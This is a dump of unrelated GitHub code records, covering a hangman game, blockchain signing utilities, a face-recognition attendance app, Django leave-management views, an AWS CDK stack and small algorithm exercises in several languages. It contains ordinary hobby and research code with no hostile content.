\n \n if len(acertos) == len(palavra):\n caneta.setpos(-100,100)\n caneta.write('Você ganhou', font=('Arial',18,'bold'))\n time.sleep(2)\n break\n else:\n caneta.setpos(-95,100)\n caneta.write('Escolha Inválida.', font=('Arial',18,'bold'))\n time.sleep(2)\n caneta.reset()\n caneta_setup()\n \n nome_jogo(caneta)\n desenho_forca(caneta, window.window_width())\n desenho_espacos(caneta, letras_palavra, window.window_width())\n repor_desenho(caneta, posicoes_letras, acertos, erros, erros_lista, window.window_width())\n caneta.reset()\n window.reset()\n caneta_setup()\n if escolha == None:\n caneta.setpos(-95,0)\n caneta.write('Clique para Sair', font=('Arial',18,'bold'))\n caneta.home()\n window.exitonclick()\n \n \n \n \n'''\n-------------------------------------------------------------------------------\n'''\n\n\n\nwindow.exitonclick()\n","repo_name":"IgneousGuikas/RodrigoGikas_EP2","sub_path":"Exercicio Jogo da Forca(9).py","file_name":"Exercicio Jogo da Forca(9).py","file_ext":"py","file_size_in_byte":11451,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"18432273630","text":"'''\n========================\nservice utilities module\n========================\nCreated on July.14, 2020\n@author: Xu Ronghua\n@Email: rxu22@binghamton.edu\n@TaskDescription: This module provide encapsulation of test API to interact with RPC exposed by service node.\n'''\n\nimport time\nimport logging\nimport requests\nimport json\n\nfrom utilities import TypesUtil, FileUtil\nfrom wrapper_pyca import Crypto_Hash, Crypto_DSA\nfrom Tender_RPC import Tender_RPC\n\n\nlogger = logging.getLogger(__name__)\n# indextoken_logger = logging.getLogger(\"Index_Token\")\n# indextoken_logger.setLevel(logging.INFO)\n\n\nclass TenderUtils(object):\n @staticmethod\n def load_ENF(ENF_file):\n '''\n Load ENF data from ENF_file\n\n Args:\n ENF_name: ENF file name\n Returns:\n json_ENF: json format ENF data\n\n '''\n ls_lines=FileUtil.ReadLines(ENF_file)\n ls_record=[]\n for line in ls_lines:\n #print(line[:-1].split(';'))\n ls_record.append(line[:-1].split(';'))\n\n ls_ENF=[]\n for record in ls_record:\n ls_ENF.append( format(float(record[0]), '.2f') )\n\n # print(ls_ENF)\n json_ENF = {}\n json_ENF['id']=ENF_file\n json_ENF['ENF']=ls_ENF\n\n return json_ENF\n\n\n @staticmethod\n def verify_ENF(ENF_file):\n '''\n Verify ENF value by querying from blockchain\n\n Args:\n ENF_name: ENF file name\n Returns:\n Verified result: True or False\n '''\n # 1) Read token data using call\n ls_time_exec = []\n\n query_json = {}\n query_json['data']='\"' + ENF_file +'\"'\n start_time=time.time()\n\n query_ret=Tender_RPC.abci_query(query_json)\n\n # -------- parse value from response and display it ------------\n key_str=query_ret['result']['response']['key']\n value_str=query_ret['result']['response']['value']\n logger.info(\"Fetched ENF value:\")\n logger.info(\"id: {}\".format(TypesUtil.base64_to_ascii(key_str)) )\n if( value_str!= None):\n query_ENF_value = TypesUtil.base64_to_ascii(value_str)\n else:\n query_ENF_value = ''\n # convert tx to json format\n query_ENF_json = TypesUtil.tx_to_json(query_ENF_value)\n logger.info(\"value: {}\".format(query_ENF_json))\n\n # 2) verify signature\n string_ENF = str(query_ENF_json['ENF'])\n byte_ENF = TypesUtil.string_to_bytes(string_ENF)\n sign_ENF = TypesUtil.hex_to_string(query_ENF_json['sign_ENF'])\n\n load_public_key_bytes = Crypto_DSA.load_key_bytes('public_key_file')\n reload_public_key = Crypto_DSA.load_public_key_bytes(load_public_key_bytes)\n verify_sign=Crypto_DSA.verify(reload_public_key,sign_ENF,byte_ENF)\n logger.info(\"Sign verification: {}\".format(verify_sign))\n \n exec_time=time.time()-start_time\n ls_time_exec.append( format( exec_time*1000, '.3f' ) ) \n\n # Prepare log messgae\n str_time_exec=\" \".join(ls_time_exec)\n FileUtil.save_testlog('test_results', 'exec_verify_ENF.log', str_time_exec)\n\n # 3) return verify hash model result\n return verify_sign\n\n @staticmethod\n def tx_evaluate(ENF_file):\n '''\n Launch tx and evaluate tx committed time\n\n Args:\n ENF_file: ENF file name\n Returns:\n tx committed reulst\n '''\n # 1) load ENF data from file\n json_ENF = TenderUtils.load_ENF(ENF_file)\n logger.info(json_ENF)\n\n # 2) sign ENF data in json_ENF['ENF']\n string_ENF = str(json_ENF['ENF'])\n byte_ENF = TypesUtil.string_to_bytes(string_ENF)\n load_private_key_bytes = Crypto_DSA.load_key_bytes('private_key_file')\n reload_private_key = Crypto_DSA.load_private_key_bytes(load_private_key_bytes, \n encryp_pw=b'samuelxu999')\n sign_ENF = Crypto_DSA.sign(reload_private_key, byte_ENF)\n logger.info(sign_ENF)\n\n # 3) evaluate tx 
committed time\n start_time=time.time()\n logger.info(\"tx signed ENF: {} to blockchain...\\n\".format(ENF_file)) \n\n # -------- prepare parameter for tx ------------\n tx_json = {}\n key_str = ENF_file\n value_json = {}\n value_json['ENF']=json_ENF['ENF']\n value_json['sign_ENF']=TypesUtil.string_to_hex(sign_ENF)\n # convert json to tx format\n value_str = TypesUtil.json_to_tx(value_json)\n tx_data = key_str + \"=\" + value_str \n # --------- build parameter string: tx=? --------\n tx_json['tx']='\"' + tx_data +'\"' \n # print(tx_json)\n tx_ret=Tender_RPC.broadcast_tx_commit(tx_json)\n exec_time=time.time()-start_time\n logger.info(\"tx committed time: {:.3f}\\n\".format(exec_time, '.3f')) \n FileUtil.save_testlog('test_results', 'exec_tx_commit_ENF.log', format(exec_time, '.3f'))\n # print(tx_ret)\n return tx_ret\n\nclass ContractUtils(object):\n '''\n Get BC_account given node_name\n @node_name: ip_address:port_num\n @datafile: node account datafile path\n '''\n @staticmethod\n def getAddress(node_name, datafile):\n address_json = json.load(open(datafile))\n return address_json[node_name]\n\n '''\n Get IndexAuth_Token\n @host_addr: ip_address:port_num\n '''\n @staticmethod\n def getIndexToken(service_addr, index_id, data_args={}):\n #construct api_url\n api_url = \"http://\" + service_addr + \"/indexauth/api/v1.0/getIndexToken\"\n params={}\n params['index_id']=index_id\n headers = {'Content-Type' : 'application/json'}\n response = requests.get(api_url,params=params, data=json.dumps(data_args), headers=headers)\n\n #get response json\n json_response = response.json()\n\n return json_response\n\n '''\n Get authorized nodes\n @host_addr: ip_address:port_num\n '''\n @staticmethod\n def getAuthorizedNodes(service_addr, data_args={}):\n #construct api_url\n api_url = \"http://\" + service_addr + \"/indexauth/api/v1.0/getAuthorizedNodes\"\n headers = {'Content-Type' : 'application/json'}\n response = requests.get(api_url,data=json.dumps(data_args), headers=headers)\n\n #get response json\n json_response = response.json()\n\n return json_response\n\n '''\n Verify hashed index value\n @host_addr: ip_address:port_num\n '''\n @staticmethod\n def verify_indexToken(service_addr, index_id, index_data, data_args={}):\n #construct api_url\n api_url = \"http://\" + service_addr + \"/indexauth/api/v1.0/verify_indexToken\"\n params={}\n params['index_id']=index_id\n params['index_data']=index_data\n headers = {'Content-Type' : 'application/json'}\n response = requests.get(api_url,params=params, data=json.dumps(data_args), headers=headers)\n\n #get response json\n json_response = response.json()\n\n return json_response\n\n '''\n Get CapAC_Token\n @host_addr: ip_address:port_num\n '''\n @staticmethod\n def getCapToken(data_args={}):\n #construct api_url\n service_addr = data_args['service_addr']\n api_url = \"http://\" + service_addr + \"/BlendCAC/api/v1.0/getCapToken\"\n params={}\n params['client_addr']=data_args['host_address']\n headers = {'Content-Type' : 'application/json'}\n response = requests.get(api_url,params=params, data=json.dumps(data_args), headers=headers)\n\n #get response json\n json_response = response.json()\n\n return json_response\n\n '''\n Verify Access\n @host_addr: ip_address:port_num\n '''\n @staticmethod\n def isValidAccess(data_args={}):\n #construct api_url\n service_addr = data_args['service_addr']\n api_url = \"http://\" + service_addr + \"/BlendCAC/api/v1.0/isValidAccess\"\n headers = {'Content-Type' : 'application/json'}\n response = requests.get(api_url, 
data=json.dumps(data_args), headers=headers)\n\n #get response json\n json_response = response.json()\n\n return json_response\n\n '''\n Get Vnode information\n @host_addr: ip_address:port_num\n '''\n @staticmethod\n def getVNodeInfo(data_args={}):\n #construct api_url\n service_addr = data_args['service_addr']\n api_url = \"http://\" + service_addr + \"/AuthID/api/v1.0/getVNodeInfo\"\n params={}\n params['client_addr']=data_args['host_address']\n headers = {'Content-Type' : 'application/json'}\n response = requests.get(api_url,params=params, data=json.dumps(data_args), headers=headers)\n\n #get response json\n json_response = response.json()\n\n return json_response\n\n '''\n Verify identity\n @host_addr: ip_address:port_num\n '''\n @staticmethod\n def isValidID(data_args={}):\n #construct api_url\n service_addr = data_args['service_addr']\n api_url = \"http://\" + service_addr + \"/AuthID/api/v1.0/isValidID\"\n headers = {'Content-Type' : 'application/json'}\n response = requests.get(api_url, data=json.dumps(data_args), headers=headers)\n\n #get response json\n json_response = response.json()\n\n return json_response\n\nclass MonoClient(object):\n '''\n Get record by id\n '''\n @staticmethod\n def Get_DataByID(data_args={}):\n # construct params\n params={}\n params['project_id']=data_args['project_id']\n\n #construct api_url\n service_addr = data_args['service_addr']\n api_url = \"http://\" + service_addr + \"/test/api/v1.0/dt/project\" \n\n headers = {'Content-Type' : 'application/json'}\n response = requests.get(api_url,params=params, data=json.dumps(data_args['data']), headers=headers)\n \n #get response json\n json_response = response.json() \n\n return json_response","repo_name":"samuelxu999/Research","sub_path":"Security/py_dev/BlendSPS/src/service_utils.py","file_name":"service_utils.py","file_ext":"py","file_size_in_byte":9913,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
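`Crypto_DSA` above is a project-local wrapper, so its exact API isn't shown here. The sign-then-verify round trip it performs looks roughly like this with the `cryptography` package; the key size and message are placeholders:

```python
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import dsa
from cryptography.exceptions import InvalidSignature

private_key = dsa.generate_private_key(key_size=2048)
public_key = private_key.public_key()

message = str(['60.00', '60.01', '59.99']).encode('utf-8')  # stand-in for an ENF list
signature = private_key.sign(message, hashes.SHA256())

try:
    public_key.verify(signature, message, hashes.SHA256())
    print('signature valid')
except InvalidSignature:
    print('signature invalid')
```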
+{"seq_id":"30653422542","text":"from typing import List\nfrom typing import List\n\ndef sneak_string_v1(chars: str) -> List[List[str]]:\n result = [[], [], []]\n index = len(result) // 2\n up_flag = 1\n for char in chars:\n if index == 0:\n result[0].append(char)\n result[1].append(' ')\n result[2].append(' ')\n index = 1\n up_flag = 0\n elif index == 1: \n result[0].append(' ')\n result[1].append(char)\n result[2].append(' ')\n if up_flag:\n index -= 1\n else:\n index += 1\n elif index == 2:\n result[0].append(' ')\n result[1].append(' ')\n result[2].append(char)\n up_flag = 1\n index = 1\n \n return result\n\ndef sneak_string_v2(chars: str, size: int) -> List[List[str]]:\n result = [[] for _ in range(size)]\n result_index = {i for i in range(len(result))}\n insert_index = len(result) // 2\n up_flag = 1\n \n for char in chars:\n result[insert_index].append(char)\n for rest_index in result_index - {insert_index}:\n result[rest_index].append(' ')\n \n if insert_index == min(result_index):\n insert_index += 1\n up_flag = 0\n elif insert_index == max(result_index):\n insert_index -= 1\n up_flag = 1\n else:\n if up_flag:\n insert_index -= 1\n else:\n insert_index += 1\n \n return result\n \n\ndef print_sneak(result: List[List[str]]) -> None:\n for list in result:\n print(''.join(list))\n \n \n \nif __name__ == '__main__':\n chars1 = '012345678901234567890123456789'\n chars2 = 'abcdefghijklmnopqrstuzwxyz'\n # result = sneak_string_v1(chars1)\n # print_sneak(result)\n result = sneak_string_v2(chars2, 10)\n print_sneak(result)","repo_name":"Tsujiba/Python-Sample","sub_path":"algolism/07_quiz/sneak_output.py","file_name":"sneak_output.py","file_ext":"py","file_size_in_byte":1911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"7389605836","text":"import logging\n\nfrom aiohttp import web\nfrom ipaddress import ip_address\nfrom netifaces import interfaces, ifaddresses, AF_INET\nimport qrcode\n\nfrom manokee.web.app import app\n\n\ndef ipv4_addresses():\n result = []\n for interface in interfaces():\n links = ifaddresses(interface).get(AF_INET, [])\n for link in links:\n addr = ip_address(link[\"addr\"])\n if not addr.is_loopback:\n result.append(addr)\n return result\n\n\ndef main():\n port = 5000\n addresses = ipv4_addresses()\n assert len(addresses) > 0\n print(\"OPEN MANOKEE IN A BROWSER AT:\")\n for address in addresses:\n url = f\"http://{address}:{port}/\"\n print(url)\n qr = qrcode.QRCode()\n qr.add_data(url)\n qr.print_ascii()\n web.run_app(app, port=port, access_log=logging.getLogger(\"webserver\"))\n","repo_name":"smiszym/manokee","sub_path":"manokee/entrypoint.py","file_name":"entrypoint.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"21083386926","text":"import requests\nimport time\nimport re\n\nurl = 'http://comet.blog.sina.com.cn/api?maintype=hits&act=4&aid=5c47219b01011oox&ref=http%3A%2F%2Fblog.sina.com.cn%2Fu%2F1548165531&varname=requestId_63901005'\nheaders = {\n 'Referer': 'http://blog.sina.com.cn/u/5874775575'\n}\n\nwhile True:\n wb_date = requests.get(url, headers=headers)\n a = wb_date.text.split('=')[-1]\n a = int(re.findall('\\d{1,10}', a)[0])\n time.sleep(10)\n wb_date = requests.get(url, headers=headers)\n b = wb_date.text.split('=')[-1]\n b = int(re.findall('\\d{1,10}', b)[0])\n print((b - a) * 6 * 60)\n","repo_name":"meta-tabchen/Python-In-Action","sub_path":"新浪博客/count001.py","file_name":"count001.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"15454556617","text":"from sqlite3 import connect\nfrom imutils import face_utils\nimport dlib\nimport cv2\nfrom face_recognition import load_image_file, face_encodings, compare_faces\nfrom tkinter import *\nimport os\nimport cv2\nfrom tkinter import filedialog\nfrom PIL import ImageTk,Image\nimport tkinter\nimport numpy as np\nfrom scipy import spatial\ndef read_data_from_db():\n\tdb_loc = r'C:\\Users\\ELCOT\\Documents\\Chandru\\Git_Bash\\Attendance_system_using_facial_recognition\\CODE\\final\\db\\STUDENTSDATA.db'\n\t#print ('studentsdata Database opened')\n\tconn = connect(db_loc)\n\tcurser = conn.cursor()\n\tcommand = '''SELECT * FROM students_record '''\n\tdata = curser.execute(command)\n\tres_list = []\n\ttemp_lis = []\n\ttemp_encoding = []\n\tfor record in data:\n\t\ttemp_lis = list(record[0:2])\n\t\ttemp_encoding = record[2:]\n\t\ttemp_lis.append(np.asarray(temp_encoding))\n\t\tres_list.append(tuple(temp_lis))\n\tconn.close()\n\tres = tuple(res_list)\n\treturn (res)\n\ndef find_faces_in_img(img_loc):\n\t# initialize dlib's face detector (HOG-based) and then create\n\t# the facial landmark predictor\n\tdetector = dlib.get_frontal_face_detector()\n\t# load the input image and convert it to grayscale\n\timage = cv2.imread(img_loc)\n\tgray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\t#frame = imutils.resize(frame, width=450)\n\t# detect faces in the grayscale image\n\trects = detector(gray, 0)\n\tencoding_in_class_lis = []\n\t# loop over the face detections\n\tfor (i, rect) in enumerate(rects):\n\t\t# determine the facial landmarks for the face region, then\n\t\t# convert the facial landmark (x, y)-coordinates to a NumPy\n\t\t# array\n\t\t# Start coordinate, here (5, 5) \n\t\t# represents the top left corner of rectangle \n\t\tlis = []\n\t\tlis.append(rect.left())\n\t\tlis.append(rect.top())\n\t\tstart_point = tuple(map(int, lis))\n\t\t# Ending coordinate, here (220, 220) \n\t\t# represents the bottom right corner of rectangle \n\t\tlis = []\n\t\tlis.append(rect.right())\n\t\tlis.append(rect.bottom())\n\t\tend_point = tuple(map(int, lis))\n\t\t# # Blue color in BGR \n\t\t# color = (255, 0, 0) \n\t\t# # Line thickness of 2 px \n\t\t# thickness = 2\n\t\tcrop_img = image[start_point[1]:end_point[1], start_point[0]:end_point[0]]\n\t\tcv2.imwrite(r'C:\\Users\\ELCOT\\Documents\\Cls{}.jpg'.format(i), crop_img)\n\t\tencoding = face_encodings(crop_img)[0]\n\t\tencoding_in_class_lis.append(encoding)\n\tencoding_in_class = tuple(encoding_in_class_lis)\n\treturn (encoding_in_class)\n\ndef compare_2_faces(known_encoding, unknown_encoding):\n\t# known encoding will be register images that is already in the db\n\t# unknown encoding will be the image taken \n\t# result = 1 - spatial.distance.cosine(known_encoding, unknown_encoding)\n\t# print(result)\n\t# return (result)\n\tres = compare_faces([known_encoding], unknown_encoding, tolerance=0.5)[0]\n\t#print(res)\n\treturn (res)\n\ndef compare_in_db(encoding_in_class, encoding_in_db):\n\tfor i in encoding_in_class:\n\t\tfor j in encoding_in_db:\n\t\t\tif (compare_2_faces(j[2], i)):\n\t\t\t\tprint(j[0])\n\t\t\t\tprint(j[1])\n\t\t\t\tbreak\n\ndef browse():\n global filename\n \n \n filename = filedialog.askopenfilename(initialdir = \"/\",\n title = \"Select a File\",\n filetypes = ((\"all files\",\n \"*.*\"),\n (\"Text files\",\n \"*.txt*\")))\n\n \n\n label_file_explorer = Label(\n text = \"File Explorer using Tkinter\",\n width = 100, height = 4,\n fg = \"blue\")\n\n label_file_explorer.configure(text=\"File Opened: \"+filename)\n 
Label(screen,text = filename).place(x=150,y=100)\n\n button_exit = Button(\n text = \"Exit\",\n command = exit)\n\ndef send_data():\n\timg_loc = filename\n\tencoding_in_class = find_faces_in_img(img_loc)\n\tencoding_in_db = read_data_from_db()\n\tcompare_in_db(encoding_in_class, encoding_in_db)\n\ndef main_screen():\n\tglobal screen\n\tscreen = Tk()\n\tscreen.geometry(\"400x350\")\n\tscreen.title(\"Register\")\n\tglobal userid\n\tglobal stdname\n\tglobal path\n\tglobal registerid\n\tglobal studentname\n\tglobal filepath\n\tuserid=StringVar()\n\tstdname=StringVar()\n\tpath=StringVar()\n\tLabel(screen,text=\"Browse Image to mark attendance \").place(x=100,y=50)\n\tLabel(screen,text=\"\").pack()\n\tLabel(screen,text = \"Choose Image:\").place(x=50,y=100)\n\tButton(screen,text = \"Browse\",width=\"15\", command = browse).place(x=150,y=150)\n\tButton(screen,text = \"submit\",width=\"15\", command = send_data).place(x=150,y=200)\n\tscreen.mainloop()\n\nif __name__ == \"__main__\":\n\tmain_screen()","repo_name":"KabilChakravarthy/Face_Recognition_Attendance_System","sub_path":"CODE/final/face_attend_2.py","file_name":"face_attend_2.py","file_ext":"py","file_size_in_byte":4588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
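The attendance flow above boils down to one `face_recognition` round trip: encode a registered face, encode a face cropped from the class photo, and compare. A minimal sketch, with hypothetical file names and each image assumed to contain exactly one face:

```python
import face_recognition

known_image = face_recognition.load_image_file('registered_student.jpg')
unknown_image = face_recognition.load_image_file('class_crop.jpg')

known_encoding = face_recognition.face_encodings(known_image)[0]
unknown_encoding = face_recognition.face_encodings(unknown_image)[0]

# same tolerance as compare_2_faces in the entry above
match = face_recognition.compare_faces([known_encoding], unknown_encoding, tolerance=0.5)[0]
print('same person' if match else 'different person')
```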
+{"seq_id":"23994749870","text":"\nimport datetime\nfrom datetime import date\nfrom leave.models import Leave, LeaveSummary\nfrom mysite.share.views import getUsername, handleInput, urlResponse, verifyAndGenNewToken, sessionExpiredResponse, wrongParameterResponse\n\ndef leaveSummary(request):\n authorization = verifyAndGenNewToken(request.headers['Authorization'])\n if authorization == '':\n return sessionExpiredResponse()\n username = getUsername(authorization)\n if username is None:\n return wrongParameterResponse()\n leaveSummary = LeaveSummary.objects.filter(username=username, is_deleted=0)\n return urlResponse({'data': [LeaveSummary.deserialize(ls) for ls in leaveSummary]}, 200, authorization)\n\ndef leaveComing(request):\n authorization = verifyAndGenNewToken(request.headers['Authorization'])\n if authorization == '':\n return sessionExpiredResponse()\n username = getUsername(authorization)\n if username is None:\n return wrongParameterResponse()\n leave = Leave.objects.filter(username=username, leave_date__gte=date.today(), rejected_remark='', is_deleted=0).exclude(approved_by='').order_by('leave_date')\n return urlResponse({'data': [Leave.deserialize(l) for l in leave]}, 200, authorization)\n\ndef leavePending(request):\n authorization = verifyAndGenNewToken(request.headers['Authorization'])\n if authorization == '':\n return sessionExpiredResponse()\n username = getUsername(authorization)\n if username is None:\n return wrongParameterResponse()\n leave = Leave.objects.filter(username=username, approved_by='', rejected_remark='', is_deleted=0).order_by('leave_date')\n return urlResponse({'data': [Leave.deserialize(l) for l in leave]}, 200, authorization)\n\ndef leaveHistory(request):\n authorization = verifyAndGenNewToken(request.headers['Authorization'])\n if authorization == '':\n return sessionExpiredResponse()\n username = getUsername(authorization)\n if username is None:\n return wrongParameterResponse()\n leave = Leave.objects.filter(username=username, leave_date__lt=date.today(), is_deleted=0).exclude(approved_by='').order_by('-leave_date')\n return urlResponse({'data': [Leave.deserialize(l) for l in leave]}, 200, authorization)\n\ndef leaveApproval(request):\n authorization = verifyAndGenNewToken(request.headers['Authorization'])\n if authorization == '':\n return sessionExpiredResponse()\n username = handleInput(request, ['username'], 'GET')\n if username is None:\n return wrongParameterResponse()\n leave = Leave.objects.filter(approver=username, approved_by='', is_deleted=0).order_by('-leave_date')\n return urlResponse({'data': [Leave.deserialize(l) for l in leave]}, 200, authorization)\n\ndef applyLeave(request):\n authorization = verifyAndGenNewToken(request.headers['Authorization'])\n if authorization == '':\n return sessionExpiredResponse()\n username = getUsername(authorization)\n leave_type, leave_from, fromTime, leave_to, toTime, approver, attachment, remark = handleInput(request, \n ['leave_type', 'from', 'fromTime', 'to', 'toTime', 'approver', 'attachment', 'remark'], 'POST')\n leaveFrom = leave_from.split('T')\n startDate = datetime.datetime(leaveFrom[0], leaveFrom[1], leaveFrom[2], 0, 0)\n leaveTo = leave_to.split('T')\n endDate = datetime.datetime(leaveTo[0], leaveTo[1], leaveTo[2], 0, 0)\n delta = datetime.timedelta(days=1)\n numberOfLeaveTaken = 0\n while (startDate <= endDate):\n newLeave = dict()\n newLeave['created_by'] = username\n newLeave['updated_by'] = username\n newLeave['username'] = username\n newLeave['leave_type'] = leave_type\n 
newLeave['leave_date'] = startDate\n newLeave['approver'] = approver\n newLeave['attachment'] = attachment\n newLeave['remark'] = remark\n if numberOfLeaveTaken == 0:\n if len(fromTime) > 0:\n newLeave['leave_date_time'] = fromTime\n numberOfLeaveTaken -= 0.5\n if startDate == endDate: \n if len(toTime) > 0:\n newLeave['leave_date_time'] = toTime\n numberOfLeaveTaken -= 0.5\n startDate += delta\n numberOfLeaveTaken += 1\n newLeaveRecord = Leave()\n newLeaveRecord.saveNew(newLeave)\n leaveSummary = LeaveSummary.objects.filter(username=username, is_deleted=0, leave_type=leave_type).first()\n leaveSummary.leave_balance -= numberOfLeaveTaken\n leaveSummary.save()\n return urlResponse({'message': 'Data successfully addded!'}, 200, authorization)","repo_name":"Justaway97/back-end-template","sub_path":"mysite/leave/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
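The hand-rolled date parsing fixed in `applyLeave` above can also lean on the standard library; a sketch of the same per-day loop with `date.fromisoformat` (the payload values are made up):

```python
import datetime

leave_from = '2021-03-01T00:00'  # hypothetical request values
leave_to = '2021-03-03T00:00'

day = datetime.date.fromisoformat(leave_from.split('T')[0])
end = datetime.date.fromisoformat(leave_to.split('T')[0])

while day <= end:
    print(day)  # one Leave row would be created per day in the range
    day += datetime.timedelta(days=1)
```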
+{"seq_id":"33059350465","text":"from aws_cdk import (\n Environment,\n RemovalPolicy,\n Stage,\n Duration,\n Stack,\n pipelines as cdkpipe,\n aws_codepipeline as pipe,\n aws_sqs as sqs,\n aws_s3 as s3\n)\nfrom constructs import Construct\nimport random, string\n\n\ndef generate_random_string(length):\n characters = string.ascii_letters + string.digits\n random_string = ''.join(random.choice(characters) for _ in range(length))\n return random_string\n\nrandom_string = generate_random_string(10)\n\nclass ResourceEuropeStack(Stack):\n\n def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:\n super().__init__(scope, construct_id, **kwargs)\n\n queue = sqs.Queue(\n self, \"MyEuropeanQueue\",\n visibility_timeout=Duration.seconds(300),\n )\n bucket = s3.Bucket(self, \"myEuropeanBucket\", \n bucket_name=f\"my-european-bucket-{random_string.lower()}\",\n versioned=True,\n block_public_access=s3.BlockPublicAccess.BLOCK_ALL,\n auto_delete_objects=True,\n removal_policy=RemovalPolicy.DESTROY\n )\n \nclass DeployEuropeStage(Stage):\n def __init__(self, scope: Construct, construct_id: str, env: Environment, **kwargs) -> None:\n super().__init__(scope, construct_id, **kwargs)\n\n ResourceEuropeStack(self, 'ResourceStack', env=env, stack_name='test-stack-in-EUROPE')\n","repo_name":"andreistavarache/aws-cdk-pipeline","sub_path":"aws_cdk_pipeline/europe_resources.py","file_name":"europe_resources.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"1132098238","text":"# 내 풀이\n# 연산자 우선순위 재정의하여 만들 수 있는 가장 큰 숫자 제출(+,-,*), 절댓값\n# 연산자 들을 리스트에 담아서 중복걸러낸 다음에 우선순위 정함\n# 같은 연산자 끼리는 앞에 있는 것의 우선순위가 더 높다\n# 문자열 수식을 계산하는 eval()이용 \nimport math\nfrom itertools import permutations\ndef solution(ex):\n res = [] # 연산자를 기준으로 문자열을 잘라서 저장하는 리스트\n ans = [] # 우선순위에 따라 나올 수 있는 값들의 리스트\n k = [\"-\",\"+\",\"*\"]\n _k = [i for i in ex if i in k]\n l = [(i,j) for i,j in enumerate(ex) if j in k] # -,+,* 가 들어있는 인덱스와 값 저장 \n dup = list(set(_k))\n \n # 잘라서 넣기\n for i in range(len(l)):\n if i == 0:\n b = l[0][0]\n print(b)\n res.append(ex[:b])\n res.append(ex[b])\n else:\n a = b + 1 # start\n b = l[i][0] # end\n res.append(ex[a:b])\n res.append(ex[b])\n res.append(ex[b+1:])\n print(res)\n \n p = list(permutations(dup,len(dup))) # 우선순위 조합\n print(p)\n \n # 우선순위에 맞게 계산\n for i in range(len(p)): # 우선순위 조합 탐색\n arr = res[:]\n for j in range(len(dup)): # 연산자 우선순위(1,2,3) 탐색\n x = arr.count(p[i][j])\n for _ in range(x): # 같은 연산자 여러개면 그 개수만큼 반복\n r = arr.index(p[i][j])\n arr[r-1] = str(eval(arr[r-1]+arr[r]+arr[r+1])) # 연산자로 계산해서 그 값을 리스트에 다시 저장\n del arr[r] \n del arr[r]\n print(arr)\n ans.append(abs(int(arr[0])))\n # print(ans)\n # print(p) \n return int(max(ans))\n\n\n \n# 더 나은 풀이\n# 정규 표현식 이용\nimport re\nfrom itertools import permutations\n\ndef solution(expression):\n #1\n op = [x for x in ['*','+','-'] if x in expression]\n op = [list(y) for y in permutations(op)]\n ex = re.split(r'(\\D)',expression)\n\n #2\n a = []\n for x in op:\n _ex = ex[:]\n for y in x:\n while y in _ex:\n tmp = _ex.index(y)\n _ex[tmp-1] = str(eval(_ex[tmp-1]+_ex[tmp]+_ex[tmp+1])) # 나랑 똑같은 방식\n _ex = _ex[:tmp]+_ex[tmp+2:] # del로 제거하는 대신에 슬라이싱 이용 \n a.append(_ex[-1])\n\n #3\n return max(abs(int(x)) for x in a)","repo_name":"yeye921/algorithm-study","sub_path":"Level2/maximize_formula.py","file_name":"maximize_formula.py","file_ext":"py","file_size_in_byte":2535,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"30317742726","text":"# Напишите программу, которая определит позицию второго вхождения строки в списке либо сообщит, что её нет.\n# *Пример:*\n# - список: [\"qwe\", \"asd\", \"zxc\", \"qwe\", \"ertqwe\"], ищем: \"qwe\", ответ: 3\n# - список: [\"йцу\", \"фыв\", \"ячс\", \"цук\", \"йцукен\", \"йцу\"], ищем: \"йцу\", ответ: 5\n# - список: [\"йцу\", \"фыв\", \"ячс\", \"цук\", \"йцукен\"], ищем: \"йцу\", ответ: -1\n# - список: [\"123\", \"234\", 123, \"567\"], ищем: \"123\", ответ: -1\n# - список: [], ищем: \"123\", ответ: -1\n\n# my_list = [\"123\", \"234\", 123, '567']\n# print(my_list)\n\n# string_find = \"123\"\n# count = 0\n# for i in range(len(my_list)):\n# if string_find == my_list[i]:\n# count += 1\n# if count == 2:\n# print(i)\n# else:\n# print(-1)\n\nmy_list = [\"йцу\", \"фыв\", \"ячс\", \"цук\", \"йцукен\", \"йцу\"]\nmy_str = input('Введите строку')\n\nif my_list.count(my_str) > 1:\n first_index = my_list.index(my_str)\n print(my_list.index(my_str, first_index + 1))\nelse:\n print(-1)\n\n# Улучшение кода:\n\nfrom typing import List \n\ndef find_second_entry(str_list: List[str], search_word: str):\n try:\n return [i for i, elem in enumerate(str_list) if elem == search_word][1]\n except IndexError:\n return -1","repo_name":"dvsni/Python","sub_path":"Task #6.5.py","file_name":"Task #6.5.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
